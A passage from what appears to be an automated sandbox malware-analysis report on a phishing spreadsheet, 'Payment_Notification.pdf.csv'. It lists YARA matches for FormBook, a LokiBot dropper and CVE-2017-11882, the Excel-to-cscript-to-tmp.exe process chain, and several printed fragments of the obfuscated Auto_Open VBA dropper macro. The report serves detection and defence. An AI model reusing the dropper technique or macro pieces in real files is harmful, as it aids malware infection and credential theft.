    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://www.odwebp.svc.ms

    E-Banking Fraud:

    Yara detected FormBook
    Source: Yara match, file source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp, type: MEMORY

    System Summary:

    Malicious sample detected (through community Yara rule)
    Source: 00000004.00000003.1121140244.0000000006441000.00000004.00000001.sdmp, type: MEMORY; matched rule: Auto-generated rule - file scan copy.pdf.r11, Author: Florian Roth
    Source: 00000004.00000003.1120953960.0000000006457000.00000004.00000001.sdmp, type: MEMORY; matched rule: Auto-generated rule - file scan copy.pdf.r11, Author: Florian Roth
    Source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp, type: MEMORY; matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
    Source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp, type: MEMORY; matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000004.00000003.1121082322.00000000037FC000.00000004.00000001.sdmp, type: MEMORY; matched rule: Auto-generated rule - file scan copy.pdf.r11, Author: Florian Roth
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\mso8D7C.tmp, type: DROPPED; matched rule: EXP_potential_CVE_2017_11882, Author: ReversingLabs
    Document contains an embedded VBA macro which may execute processes
    Source: Payment_Notification.pdf.csv (OLE), VBA macro line: Shell "type NUL > " + TXTFile
    Document contains an embedded VBA macro with suspicious strings
    Source: Payment_Notification.pdf.csv (OLE), VBA macro line: xcvbnmcvnm = xcvbnmcvnm + " sWScript = ""WScript""" + vbCrLf
    Source: Payment_Notification.pdf.csv (OLE), VBA macro line: xcvbnmcvnm = xcvbnmcvnm + " sWScript = sWScript + "".""" + vbCrLf
    Source: Payment_Notification.pdf.csv (OLE), VBA macro line: xcvbnmcvnm = xcvbnmcvnm + " m = sWScript + ""Sh""" + vbCrLf
    Source: Payment_Notification.pdf.csv (OLE), VBA macro line: xcvbnmcvnm = xcvbnmcvnm + " WScript.Echo ""If you don't like toenails, you probably shouldn't look at your feet."" " + vbCrLf
    Source: Payment_Notification.pdf.csv (OLE), VBA macro line: xcvbnmcvnm = xcvbnmcvnm + " Set objHTTP = CreateObject( ""WinHttp.WinHttpRequest.5.1"" )" + vbCrLf
    Document contains an embedded VBA with functions possibly related to ADO stream file operations
    Source: Payment_Notification.pdf.csv, stream path 'VBA/Module1': found possibly 'ADODB.Stream' functions position, open, read, readtext, write
    Microsoft Office drops suspicious files
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, file created: C:\programdata\asc.txt:script1.vbs
    Source: C:\ProgramData\tmp.exeCode function: 7_2_00568F1B NtSetInformationThread,7_2_00568F1B
    Source: C:\ProgramData\tmp.exeCode function: 7_2_00568FB9 NtSetInformationThread,7_2_00568FB9
    Source: Payment_Notification.pdf.csv OLE, VBA macro line: Sub Auto_Open()
    Source: C:\ProgramData\tmp.exe Code function: String function: 1F18B0E0 appears 176 times
    Source: C:\ProgramData\tmp.exe Code function: String function: 1F1DDDE8 appears 48 times
    Source: C:\ProgramData\tmp.exe Code function: String function: 1F215110 appears 38 times
    Source: 00000004.00000003.1121140244.0000000006441000.00000004.00000001.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000004.00000003.1120953960.0000000006457000.00000004.00000001.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000004.00000003.1121082322.00000000037FC000.00000004.00000001.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\mso8D7C.tmp, type: DROPPED Matched rule: EXP_potential_CVE_2017_11882 author = ReversingLabs, reference = https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html
    Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winCSV@10/12@0/1
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2520:120:WilError_01
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{DEC44A8B-235A-499E-84E6-942C660EF40C} - OProcSessId.dat
    Source: unknown Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs
    Source: C:\ProgramData\tmp.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File read: C:\Users\desktop.ini
    Source: C:\Windows\SysWOW64\cscript.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' 'C:\Users\user\Desktop\Payment_Notification.pdf.csv'
    Source: unknown Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
    Source: unknown Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs
    Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknown Process created: C:\ProgramData\tmp.exe C:\programData\tmp.exe
    Source: unknown Process created: C:\ProgramData\tmp.exe C:\programData\tmp.exe
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs
    Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\ProgramData\tmp.exe C:\programData\tmp.exe
    Source: C:\ProgramData\tmp.exe Process created: C:\ProgramData\tmp.exe C:\programData\tmp.exe
    Source: C:\Windows\SysWOW64\cscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
    Source: Window Recorder Window detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
    Source: Payment_Notification.pdf.csv Static file information: File size 2782235 > 1048576
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
    Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.1204250327.0000000007010000.00000002.00000001.sdmp
    Source: Binary string: wntdll.pdbUGP source: tmp.exe, 00000007.00000002.1246844926.000000001F27F000.00000040.00000001.sdmp
    Source: Binary string: wntdll.pdb source: tmp.exe
    Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.1204250327.0000000007010000.00000002.00000001.sdmp

    Data Obfuscation: